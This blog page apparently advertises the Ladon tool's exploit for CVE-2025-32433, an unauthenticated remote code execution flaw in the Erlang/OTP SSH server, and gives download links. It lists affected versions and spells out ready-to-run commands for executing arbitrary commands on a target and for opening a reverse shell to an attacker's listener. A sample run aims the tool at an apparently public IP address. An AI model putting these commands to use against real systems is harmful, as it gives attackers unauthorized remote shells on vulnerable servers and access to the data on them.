Ladon CVE-2025-32433 Erlang/OTP SSH EXP
CVE-2025-32433 Erlang/OTP SSH RCE EXP
Description
A serious vulnerability has been identified in the Erlang/OTP SSH server that may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This could lead to compromise of said hosts, allowing for unauthorized access to and manipulation of sensitive data by third parties, or denial-of-service attacks.
Affected Versions
OTP-27.3.2 and earlier
OTP-26.2.5.10 and earlier
OTP-25.3.2.19 and earlier
Features
- Exploit Execution: Execute arbitrary commands.
- Reverse Shell: Initiate a bash-based reverse shell.
Usage
Usage:
Ladon CVE-2025-32433 <target_ip> <target_port> [mode] [options]
Modes:
-
Command Execution Mode:
Ladon CVE-2025-32433 <target_ip> <target_port> cmd “” Example:
1
Ladon CVE-2025-32433 192.168.18.9 2222 cmd "id>888.txt"
-
Reverse Shell Mode:
Ladon CVE-2025-32433 <target_ip> <target_port> shell <local_ip> <local_port>Example:
1
Ladon CVE-2025-32433 192.168.18.9 2222 shell 192.168.18.203 4444
Result
1 | C:\Users\Administrator\Desktop\Ladon12>Ladon CVE-2025-32433 185.164.148.243 7777 shell 192.168.1.1 4444 |
Download
LadonGo (ALL OS)
https://github.com/k8gege/LadonGo/releases
Ladon (Windows & Cobalt Strike)
历史版本: https://github.com/k8gege/Ladon/releases
911版本:http://k8gege.org/Download
References
转载声明
K8博客文章随意转载,转载请注明出处! © K8gege http://k8gege.org

扫码加入K8小密圈